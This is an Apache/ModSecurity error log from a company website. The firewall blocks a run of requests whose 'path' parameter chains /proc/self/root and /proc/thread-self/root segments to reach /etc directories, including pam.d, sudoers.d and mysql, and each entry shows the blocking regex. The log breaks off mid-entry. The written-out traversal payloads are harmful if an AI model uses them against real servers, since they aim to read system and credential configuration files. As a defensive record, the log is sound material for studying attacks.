[Fri Mar 20 06:27:52.868926 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:59410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TGF1pVZ5mVmJwsFMdjwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:54.197145 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:59412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TGjJ3M9BSuKP7CAYE-AAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:55.203031 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:39826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TG_qxLDW4GITHUkTSwgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:56.523346 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.241.31:39832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0THPXLqtnMIWvjpaKHygAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:59.892560 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:60340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0THjJ3M9BSuKP7CAYE_gAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:01.573337 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.241.31:60352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TIQF0L0L-SsrnPo5VUwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:03.907165 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:60366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TIgF0L0L-SsrnPo5VWAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:05.337347 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:60368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TJTJ3M9BSuKP7CAYFDgAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:06.632474 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:59414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TJvXLqtnMIWvjpaKH1gAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:28:07.909635 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:46138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TJzJ3M9BSuKP7CAYFFwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:28:07.917002 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:60370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TJ9a6ubjKNq_cu4bARAAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:09.256203 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.241.31:48306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TKfHIg5MgXLBnicPnQAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:10.266594 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:46150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TKhCii7xarUs8iHZWEQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:14.930206 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.241.31:48316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TLrninkcc-iUj5ApMPQAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:16.212762 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:48318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TMDJ3M9BSuKP7CAYFGgAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:17.400550 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:35222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TMda6ubjKNq_cu4bATAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:18.744606 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:35224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TMjJ3M9BSuKP7CAYFIAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:24.071034 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:35238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TOPHIg5MgXLBnicPnRgAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:25.363124 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:35252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TOda6ubjKNq_cu4bATwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:27.348659 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:39546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TOhCii7xarUs8iHZWIwAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:28:27.352441 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:35268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TOta6ubjKNq_cu4bAUgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:28:29.300846 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:58048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 